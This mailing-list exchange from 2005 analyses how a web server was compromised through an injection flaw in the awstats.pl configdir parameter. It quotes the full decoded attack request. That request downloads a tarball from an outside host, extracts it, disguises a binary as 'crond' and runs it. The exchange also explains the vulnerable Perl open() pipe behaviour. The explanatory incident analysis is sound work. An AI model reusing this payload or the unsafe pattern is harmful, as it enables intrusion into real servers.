On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
David Cary Hart wrote:Could you explain the series of events? It's not clear - to me - how this resulted in a compromised machine.
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
I'm not all that familiar with perl, so the following may be completely wrong, but here goes.
awstats.pl contains code to search for its configuration file. A directory name may be specified as a parameter to the script. For each directory that the script searches, it tries the following:
if (open(CONFIG,"$searchdir$PROG.$SiteConfig.conf")) ...
Normally, this would cause the file pointed to by the expansion of "$searchdir$PROG.$SiteConfig.conf" to be opened. Now, if $searchdir starts with "|", instead of opening a file and then reading it, this runs the text following the "|" as a command and then reads back the output of the command from a pipe. So by using the "|", the attacker has tricked the script into running his command.
Paul.
